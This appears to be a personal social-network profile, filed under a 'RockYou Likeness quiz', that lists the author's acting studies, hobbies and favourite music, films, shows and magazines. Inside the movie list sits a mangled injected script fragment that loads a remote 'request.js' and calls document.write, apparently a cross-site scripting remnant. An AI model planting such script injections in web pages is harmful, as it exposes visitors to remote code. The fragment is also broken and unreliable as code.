RockYou Likeness quiz
Im going to college and studying Theater and film acting. I like watching new movies that come out. I enjoy eating good food and drinking wine. I like reading the magazines Time,People,and NewsWeek magazine. My hobbies are singing,drawing cartoons,writing,playing basketball,tennis,Golf,hiking,workin out at the gym. Spinning,and swimming,No Limit holdem, Blackjack
The people who I would like to meet are Denzel Washington, Julia Roberts, George Clooney, Harrison Ford, Orlando Bloom,
Flight of the Concords,Carman,Nickleback,Snowpatrol,Greencard, NewsBoyz,Insiderz,Yellowcard,Supertones,RelientK, American Rejects,Seven Foot Crutch, Kelly,Jakie Valaques,Delerious, Simple Plan,POD,West Life,Will Smith,Li Bowow, Kanya West,Green Day,Big on 80's music,Carpenters,Landmark Trio ect
Willy Wonka, Labreinth, Neverending Story,Land Before Time,Princess Bride,Indiana Jones, Empire Strikes Back,Return of the Jedi, Last Star fighter, The Goonies,Weird Science,Howard the Duck Rocky 4 and 5,Over the Top,Back to the Future,The Wizard,Flight of the Navegator,WarGames,ProjectX,TopGun,Dirty Dancing,Salsa, Spaceballs,Howard the Duck,Adventures in Babysitting,Batman,GhostBusters Dark City,Journey to the Centerof the Earth, Wizard of Oz,The Game, Matrix,Strange Days,The Quest,The Relic,Mimic,T2,13th Floor,The Jerk,Mr.Bean,Jamunji,SpyGame,Titanic,Creminal,.... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("..1...{}");}..
Inside the Actors Studio,Smallville, Heroes,Whose line is it anyway,National Geo,One Tree Hill,
Journey to the Center of the Earth,Lord of the Rings,The Hobbit,The Color Purple,Time,People,NewsWeek,National Geo, Omni, Popular Science
Carman,Denzel Washington,Cuba Gooding Jr.,Robin Williams,Jack Black,Jack Nickleson,